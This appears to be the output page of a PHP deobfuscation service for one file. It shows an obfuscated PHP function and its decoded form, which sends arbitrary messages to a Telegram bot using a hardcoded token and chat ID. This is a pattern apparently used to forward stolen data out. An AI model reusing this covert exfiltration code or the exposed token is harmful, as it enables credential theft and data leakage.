Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function ant1($msg) { $token = "\x32\60\71\64\60\70\x34\x35\x34\x37\72\101\x41\x46..

Decoded Output download

<?php 
 function ant1($msg) { $token = "2094084547:AAFCU2mkBCZPgf7Zpk5wGqphhay-Q4h_XXs"; $chat_id = 862452385; $request = array("chat_id" => $chat_id, "text" => $msg); $request_url = "https://api.telegram.org/bot" . $token . "/sendMessage?" . http_build_query($request); file_get_contents($request_url); } ?>

Did this file decode correctly?

Original Code

<?php
 function ant1($msg) { $token = "\x32\60\71\64\60\70\x34\x35\x34\x37\72\101\x41\x46\103\x55\x32\155\153\102\x43\132\x50\147\146\x37\132\160\153\65\167\107\161\160\150\150\x61\x79\x2d\x51\64\x68\137\x58\x58\163"; $chat_id = 862452385; $request = array("\x63\x68\x61\x74\x5f\151\x64" => $chat_id, "\x74\x65\170\x74" => $msg); $request_url = "\x68\x74\x74\x70\x73\72\x2f\57\x61\x70\151\x2e\164\x65\154\x65\x67\x72\141\x6d\56\157\162\x67\57\x62\x6f\164" . $token . "\x2f\163\x65\156\x64\x4d\x65\163\163\141\147\145\x3f" . http_build_query($request); file_get_contents($request_url); } ?>

Function Calls

None

Variables

None

Stats

MD5 e4e80a9ce3be63a74ef6d9e4ae26ba4a
Eval Count 0
Decode Time 82 ms